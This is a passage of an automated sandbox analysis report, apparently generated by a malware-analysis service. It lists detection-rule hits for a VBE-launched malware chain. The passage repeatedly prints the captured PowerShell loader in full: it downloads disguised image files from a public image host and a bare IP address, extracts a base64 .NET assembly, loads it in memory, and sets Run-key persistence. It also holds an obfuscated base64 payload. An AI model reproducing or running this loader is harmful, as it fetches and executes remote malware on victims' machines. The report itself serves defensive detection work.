($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalF
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTre
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5612, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49699
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\dereac.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\dereac.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\dereac.vbe", ProcessId: 5612, ProcessName: wscript.exe
Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTre
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Name.vbs, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3564, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6392, TargetFilename: C:\ProgramData\Name.vbs
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5612, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49699
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbs, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbs, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3564, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbs, ProcessId: 6392, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalF
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalF
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\dereac.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\dereac.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\dereac.vbe", ProcessId: 5612, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTre

Data Obfuscation

barindex
Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = 